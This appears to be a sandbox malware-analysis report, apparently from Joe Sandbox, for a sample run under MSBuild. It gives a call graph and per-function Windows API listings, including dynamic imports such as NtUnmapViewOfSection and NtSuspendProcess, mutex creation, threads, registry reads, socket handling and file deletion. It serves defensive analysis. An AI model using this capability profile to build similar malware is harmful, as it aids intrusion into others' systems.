_strftime 47104->47468 47108 40ecdb 47392 401e65 22 API calls 47108->47392 47110 40ecf5 47393 401e65 22 API calls 47110->47393 47112 40ed80 47115 40ed8a 47112->47115 47120 40ef06 ___scrt_fastfail 47112->47120 47113 40ed0e 47113->47112 47394 401e65 22 API calls 47113->47394 47116 40ed93 47115->47116 47123 40ee0f 47115->47123 47400 401e65 22 API calls 47116->47400 47118 40ed9c 47401 401e65 22 API calls 47118->47401 47119 40ed23 _wcslen 47119->47112 47395 401e65 22 API calls 47119->47395 47411 4136f8 RegOpenKeyExA RegQueryValueExA RegCloseKey 47120->47411 47122 40edae 47402 401e65 22 API calls 47122->47402 47146 40ee0a ___scrt_fastfail 47123->47146 47125 40ed3e 47396 401e65 22 API calls 47125->47396 47128 40edc0 47403 401e65 22 API calls 47128->47403 47130 40ed53 47397 40da34 31 API calls 47130->47397 47131 40ef51 47412 401e65 22 API calls 47131->47412 47135 40ede9 47404 401e65 22 API calls 47135->47404 47136 40ef76 47413 402093 28 API calls 47136->47413 47137 40ed66 47398 401f13 28 API calls 47137->47398 47139 40ed72 47399 401f09 11 API calls 47139->47399 47142 40ef88 47414 41376f 14 API calls 47142->47414 47144 40edfa 47405 40cdf9 45 API calls _wcslen 47144->47405 47145 40ed7b 47145->47112 47146->47123 47406 413947 31 API calls 47146->47406 47150 40ef9e 47415 401e65 22 API calls 47150->47415 47151 40eea3 ctype 47407 401e65 22 API calls 47151->47407 47153 40efaa 47416 43baac 39 API calls _strftime 47153->47416 47156 40efb7 47158 40efe4 47156->47158 47417 41cd9b 86 API calls ___scrt_fastfail 47156->47417 47157 40eeba 47157->47131 47408 401e65 22 API calls 47157->47408 47418 402093 28 API calls 47158->47418 47160 40eed7 47409 41bc5e 28 API calls 47160->47409 47164 40efc8 CreateThread 47164->47158 47563 41d45d 10 API calls 47164->47563 47165 40eff9 47419 402093 28 API calls 47165->47419 47166 40eee3 47410 40f474 103 API calls 47166->47410 47169 40f008 47420 41b4ef 79 API calls 47169->47420 47170 40eee8 47170->47131 47172 40eeef 47170->47172 47172->47056 47173 40f00d 47421 401e65 22 API calls 47173->47421 47175 40f019 47422 401e65 22 API calls 47175->47422 47177 40f02b 47423 401e65 22 API calls 47177->47423 47179 40f04b 47424 43baac 39 API calls _strftime 47179->47424 47181 40f058 47425 401e65 22 API calls 47181->47425 47183 40f063 47426 401e65 22 API calls 47183->47426 47185 40f074 47427 401e65 22 API calls 47185->47427 47187 40f089 47428 401e65 22 API calls 47187->47428 47189 40f09a 47190 40f0a1 StrToIntA 47189->47190 47429 409de4 168 API calls _wcslen 47190->47429 47192 40f0b3 47430 401e65 22 API calls 47192->47430 47194 40f101 47439 401e65 22 API calls 47194->47439 47195 40f0bc 47195->47194 47431 4344ea 47195->47431 47200 40f0e4 47201 40f0eb CreateThread 47200->47201 47201->47194 47557 419fb4 102 API calls 2 library calls 47201->47557 47202 40f159 47441 401e65 22 API calls 47202->47441 47203 40f111 47203->47202 47205 4344ea new 22 API calls 47203->47205 47206 40f126 47205->47206 47440 401e65 22 API calls 47206->47440 47208 40f138 47211 40f13f CreateThread 47208->47211 47209 40f1cc 47447 401e65 22 API calls 47209->47447 47210 40f162 47210->47209 47442 401e65 22 API calls 47210->47442 47211->47202 47562 419fb4 102 API calls 2 library calls 47211->47562 47214 40f17e 47443 401e65 22 API calls 47214->47443 47215 40f1d5 47216 40f21a 47215->47216 47448 401e65 22 API calls 47215->47448 47452 41b60d 79 API calls 47216->47452 47220 40f193 47444 40d9e8 31 API calls 47220->47444 47221 40f223 47453 401f13 28 API calls 47221->47453 47222 40f1ea 47449 401e65 22 API calls 47222->47449 47224 40f22e 47454 401f09 11 API calls 47224->47454 47226 40f1a6 47445 401f13 28 API calls 47226->47445 47229 40f1ff 47450 43baac 39 API calls _strftime 47229->47450 47231 40f237 CreateThread 47234 40f264 47231->47234 47235 40f258 CreateThread 47231->47235 47558 40f7a7 120 API calls 47231->47558 47232 40f1b2 47446 401f09 11 API calls 47232->47446 47237 40f279 47234->47237 47238 40f26d CreateThread 47234->47238 47235->47234 47559 4120f7 137 API calls 47235->47559 47242 40f2cc 47237->47242 47455 402093 28 API calls 47237->47455 47238->47237 47560 4126db 38 API calls ___scrt_fastfail 47238->47560 47240 40f1bb CreateThread 47240->47209 47561 401be9 49 API calls _strftime 47240->47561 47241 40f20c 47451 40c162 7 API calls 47241->47451 47457 4134ff RegOpenKeyExA RegQueryValueExA RegCloseKey 47242->47457 47245 40f29c 47456 4052fd 28 API calls 47245->47456 47248 40f2e4 47248->47101 47458 41bc5e 28 API calls 47248->47458 47253 40f2fd 47459 41361b 31 API calls 47253->47459 47258 40f313 47460 401f09 11 API calls 47258->47460 47260 40f346 DeleteFileW 47261 40f34d 47260->47261 47262 40f31e 47260->47262 47463 41bc5e 28 API calls 47261->47463 47262->47260 47262->47261 47263 40f334 Sleep 47262->47263 47263->47262 47265 434984 47264->47265 47265->46969 47266 44341f 47265->47266 47565 44319c 47266->47565 47269->46951 47270->46955 47271->46962 47272->46958 47273->46971 47274->46957 47275->46977 47276->46979 47277->46982 47278->46980 47280 434b27 GetStartupInfoW 47279->47280 47280->46988 47282 44f06b 47281->47282 47283 44f062 47281->47283 47282->46991 47286 44ef58 48 API calls 4 library calls 47283->47286 47285->46991 47286->47282 47288 41cb8f LoadLibraryA GetProcAddress 47287->47288 47289 41cb7f GetModuleHandleA GetProcAddress 47287->47289 47290 41cbb8 44 API calls 47288->47290 47291 41cba8 LoadLibraryA GetProcAddress 47288->47291 47289->47288 47290->46996 47291->47290 47469 41b4a8 FindResourceA 47292->47469 47296 40f3ed _Yarn 47479 4020b7 47296->47479 47299 401fe2 28 API calls 47300 40f413 47299->47300 47301 401fd8 11 API calls 47300->47301 47302 40f41c 47301->47302 47303 43bd51 ___std_exception_copy 21 API calls 47302->47303 47304 40f42d _Yarn 47303->47304 47485 406dd8 47304->47485 47306 40f460 47306->46998 47308 40210c 47307->47308 47309 4023ce 11 API calls 47308->47309 47310 402126 47309->47310 47311 402569 28 API calls 47310->47311 47312 402134 47311->47312 47312->47001 47539 4020df 47313->47539 47315 41be2e 47319 41bea0 47315->47319 47327 401fe2 28 API calls 47315->47327 47330 401fd8 11 API calls 47315->47330 47334 41be9e 47315->47334 47543 4041a2 28 API calls 47315->47543 47544 41ce34 28 API calls 47315->47544 47316 401fd8 11 API calls 47317 41bed0 47316->47317 47318 401fd8 11 API calls 47317->47318 47320 41bed8 47318->47320 47545 4041a2 28 API calls 47319->47545 47323 401fd8 11 API calls 47320->47323 47325 40ea24 47323->47325 47324 41beac 47326 401fe2 28 API calls 47324->47326 47335 40fb17 47325->47335 47328 41beb5 47326->47328 47327->47315 47329 401fd8 11 API calls 47328->47329 47331 41bebd 47329->47331 47330->47315 47546 41ce34 28 API calls 47331->47546 47334->47316 47336 40fb23 47335->47336 47338 40fb2a 47335->47338 47547 402163 11 API calls 47336->47547 47338->47006 47341 402163 47339->47341 47340 40219f 47340->47008 47341->47340 47548 402730 11 API calls 47341->47548 47343 402184 47549 402712 11 API calls std::_Deallocate 47343->47549 47345->47014 47346->47018 47347->47021 47348->47025 47350 401ff1 47349->47350 47357 402039 47349->47357 47351 4023ce 11 API calls 47350->47351 47352 401ffa 47351->47352 47353 40203c 47352->47353 47354 402015 47352->47354 47551 40267a 11 API calls 47353->47551 47550 403098 28 API calls 47354->47550 47358 401fd8 47357->47358 47359 4023ce 11 API calls 47358->47359 47360 401fe1 47359->47360 47360->47033 47361->47037 47362->47039 47363->47041 47364->47043 47365->47051 47552 401fab 47366->47552 47368 40d073 CreateMutexA GetLastError 47368->47055 47369->47013 47370->47016 47371->47022 47372->47026 47374->47047 47375->47059 47376->47063 47377->47050 47378->47062 47379->47070 47380->47079 47381->47073 47382->47087 47383->47065 47384->47069 47385->47077 47386->47085 47387->47089 47388->47095 47389->47098 47390->47102 47391->47108 47392->47110 47393->47113 47394->47119 47395->47125 47396->47130 47397->47137 47398->47139 47399->47145 47400->47118 47401->47122 47402->47128 47403->47135 47404->47144 47405->47146 47406->47151 47407->47157 47408->47160 47409->47166 47410->47170 47411->47131 47412->47136 47413->47142 47414->47150 47415->47153 47416->47156 47417->47164 47418->47165 47419->47169 47420->47173 47421->47175 47422->47177 47423->47179 47424->47181 47425->47183 47426->47185 47427->47187 47428->47189 47429->47192 47430->47195 47435 4344ef 47431->47435 47432 43bd51 ___std_exception_copy 21 API calls 47432->47435 47433 40f0d1 47438 401e65 22 API calls 47433->47438 47435->47432 47435->47433 47553 442f80 7 API calls 2 library calls 47435->47553 47554 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47435->47554 47555 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47435->47555 47438->47200 47439->47203 47440->47208 47441->47210 47442->47214 47443->47220 47444->47226 47445->47232 47446->47240 47447->47215 47448->47222 47449->47229 47450->47241 47451->47216 47452->47221 47453->47224 47454->47231 47455->47245 47457->47248 47458->47253 47459->47258 47460->47262 47461->47071 47463->47084 47464->47091 47465->47097 47466->47101 47467->47104 47556 41ad17 103 API calls 47468->47556 47470 41b4c5 LoadResource LockResource SizeofResource 47469->47470 47471 40f3de 47469->47471 47470->47471 47472 43bd51 47471->47472 47477 446137 __Getctype 47472->47477 47473 446175 47489 4405dd 20 API calls _free 47473->47489 47475 446160 RtlAllocateHeap 47476 446173 47475->47476 47475->47477 47476->47296 47477->47473 47477->47475 47488 442f80 7 API calls 2 library calls 47477->47488 47480 4020bf 47479->47480 47490 4023ce 47480->47490 47482 4020ca 47494 40250a 47482->47494 47484 4020d9 47484->47299 47486 4020b7 28 API calls 47485->47486 47487 406dec 47486->47487 47487->47306 47488->47477 47489->47476 47491 402428 47490->47491 47492 4023d8 47490->47492 47491->47482 47492->47491 47501 4027a7 11 API calls std::_Deallocate 47492->47501 47495 40251a 47494->47495 47496 402520 47495->47496 47497 402535 47495->47497 47502 402569 47496->47502 47512 4028e8 47497->47512 47500 402533 47500->47484 47501->47491 47523 402888 47502->47523 47504 40257d 47505 402592 47504->47505 47506 4025a7 47504->47506 47528 402a34 22 API calls 47505->47528 47507 4028e8 28 API calls 47506->47507 47511 4025a5 47507->47511 47509 40259b 47529 4029da 22 API calls 47509->47529 47511->47500 47513 4028f1 47512->47513 47514 402953 47513->47514 47515 4028fb 47513->47515 47537 4028a4 22 API calls 47514->47537 47518 402904 47515->47518 47521 402917 47515->47521 47531 402cae 47518->47531 47520 402915 47520->47500 47521->47520 47522 4023ce 11 API calls 47521->47522 47522->47520 47524 402890 47523->47524 47525 402898 47524->47525 47530 402ca3 22 API calls 47524->47530 47525->47504 47528->47509 47529->47511 47532 402cb8 __EH_prolog 47531->47532 47538 402e54 22 API calls 47532->47538 47534 4023ce 11 API calls 47536 402d92 47534->47536 47535 402d24 47535->47534 47536->47520 47538->47535 47540 4020e7 47539->47540 47541 4023ce 11 API calls 47540->47541 47542 4020f2 47541->47542 47542->47315 47543->47315 47544->47315 47545->47324 47546->47334 47547->47338 47548->47343 47549->47340 47550->47357 47551->47357 47553->47435 47564 4127ee 61 API calls 47559->47564 47566 4431a8 _Atexit 47565->47566 47567 4431c0 47566->47567 47568 4432f6 _Atexit GetModuleHandleW 47566->47568 47587 445888 EnterCriticalSection 47567->47587 47570 4431b4 47568->47570 47570->47567 47599 44333a GetModuleHandleExW 47570->47599 47571 443266 47588 4432a6 47571->47588 47575 44323d 47578 443255 47575->47578 47608 4441f5 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 47575->47608 47576 443283 47591 4432b5 47576->47591 47577 4432af 47610 457729 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 47577->47610 47609 4441f5 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 47578->47609 47579 4431c8 47579->47571 47579->47575 47607 443f50 20 API calls _Atexit 47579->47607 47587->47579 47611 4458d0 LeaveCriticalSection 47588->47611 47590 44327f 47590->47576 47590->47577 47612 448cc9 47591->47612 47594 4432e3 47597 44333a _Atexit 8 API calls 47594->47597 47595 4432c3 GetPEB 47595->47594 47596 4432d3 GetCurrentProcess TerminateProcess 47595->47596 47596->47594 47598 4432eb ExitProcess 47597->47598 47600 443364 GetProcAddress 47599->47600 47601 443387 47599->47601 47606 443379 47600->47606 47602 443396 47601->47602 47603 44338d FreeLibrary 47601->47603 47604 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47602->47604 47603->47602 47605 4433a0 47604->47605 47605->47567 47606->47601 47607->47575 47608->47578 47609->47571 47611->47590 47613 448cee 47612->47613 47617 448ce4 47612->47617 47618 4484ca 47613->47618 47616 4432bf 47616->47594 47616->47595 47625 434fcb 47617->47625 47619 4484f6 47618->47619 47620 4484fa 47618->47620 47619->47620 47623 44851a 47619->47623 47632 448566 47619->47632 47620->47617 47622 448526 GetProcAddress 47624 448536 __crt_fast_encode_pointer 47622->47624 47623->47620 47623->47622 47624->47620 47626 434fd6 IsProcessorFeaturePresent 47625->47626 47627 434fd4 47625->47627 47629 435018 47626->47629 47627->47616 47639 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47629->47639 47631 4350fb 47631->47616 47633 448587 LoadLibraryExW 47632->47633 47638 44857c 47632->47638 47634 4485a4 GetLastError 47633->47634 47635 4485bc 47633->47635 47634->47635 47636 4485af LoadLibraryExW 47634->47636 47637 4485d3 FreeLibrary 47635->47637 47635->47638 47636->47635 47637->47638 47638->47619 47639->47631 47640 404e26 WaitForSingleObject 47641 404e40 SetEvent FindCloseChangeNotification 47640->47641 47642 404e57 closesocket 47640->47642 47643 404ed8 47641->47643 47644 404e64 47642->47644 47645 404e7a 47644->47645 47653 4050e4 83 API calls 47644->47653 47647 404e8c WaitForSingleObject 47645->47647 47648 404ece SetEvent CloseHandle 47645->47648 47654 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47647->47654 47648->47643 47650 404e9b SetEvent WaitForSingleObject 47655 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47650->47655 47652 404eb3 SetEvent CloseHandle CloseHandle 47652->47648 47653->47645 47654->47650 47655->47652 47656 40165e 47657 401666 47656->47657 47658 401669 47656->47658 47659 4016a8 47658->47659 47661 401696 47658->47661 47660 4344ea new 22 API calls 47659->47660 47662 40169c 47660->47662 47663 4344ea new 22 API calls 47661->47663 47663->47662

                                          Control-flow Graph

                                          APIs
                                          • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                          • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                          • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                          • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                          • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                          • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                          • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                          • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                          • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                          • API String ID: 4236061018-3687161714
                                          • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                          • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                          • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                          • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                                          • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                                          • ExitProcess.KERNEL32 ref: 004432EF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID: PkGNG
                                          • API String ID: 1703294689-263838557
                                          • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                          • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                          • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                          • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98

                                          Control-flow Graph

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                          • SetEvent.KERNEL32(?), ref: 00404E43
                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                                          • closesocket.WS2_32(?), ref: 00404E5A
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                          • SetEvent.KERNEL32(?), ref: 00404EA2
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                          • SetEvent.KERNEL32(?), ref: 00404EBA
                                          • CloseHandle.KERNEL32(?), ref: 00404EBF
                                          • CloseHandle.KERNEL32(?), ref: 00404EC4
                                          • SetEvent.KERNEL32(?), ref: 00404ED1
                                          • CloseHandle.KERNEL32(?), ref: 00404ED6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                                          • String ID: PkGNG
                                          • API String ID: 2403171778-263838557
                                          • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                          • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                          • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                          • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 30 448566-44857a 31 448587-4485a2 LoadLibraryExW 30->31 32 44857c-448585 30->32 34 4485a4-4485ad GetLastError 31->34 35 4485cb-4485d1 31->35 33 4485de-4485e0 32->33 36 4485bc 34->36 37 4485af-4485ba LoadLibraryExW 34->37 38 4485d3-4485d4 FreeLibrary 35->38 39 4485da 35->39 40 4485be-4485c0 36->40 37->40 38->39 41 4485dc-4485dd 39->41 40->35 42 4485c2-4485c9 40->42 41->33 42->41
                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                          • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
                                          • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                          • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                          • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                          • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 43 40d069-40d095 call 401fab CreateMutexA GetLastError
                                          APIs
                                          • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                          • GetLastError.KERNEL32 ref: 0040D083
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateErrorLastMutex
                                          • String ID: SG
                                          • API String ID: 1925916568-3189917014
                                          • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                          • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                          • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                          • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 46 4484ca-4484f4 47 4484f6-4484f8 46->47 48 44855f 46->48 49 4484fe-448504 47->49 50 4484fa-4484fc 47->50 51 448561-448565 48->51 52 448506-448508 call 448566 49->52 53 448520 49->53 50->51 56 44850d-448510 52->56 55 448522-448524 53->55 57 448526-448534 GetProcAddress 55->57 58 44854f-44855d 55->58 59 448541-448547 56->59 60 448512-448518 56->60 61 448536-44853f call 43436e 57->61 62 448549 57->62 58->48 59->55 60->52 64 44851a 60->64 61->50 62->58 64->53
                                          APIs
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0044852A
                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc__crt_fast_encode_pointer
                                          • String ID:
                                          • API String ID: 2279764990-0
                                          • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                          • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                                          • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                          • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 66 40165e-401664 67 401666-401668 66->67 68 401669-401674 66->68 69 401676 68->69 70 40167b-401685 68->70 69->70 71 401687-40168d 70->71 72 4016a8-4016a9 call 4344ea 70->72 71->72 73 40168f-401694 71->73 76 4016ae-4016af 72->76 73->69 75 401696-4016a6 call 4344ea 73->75 78 4016b1-4016b3 75->78 76->78
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
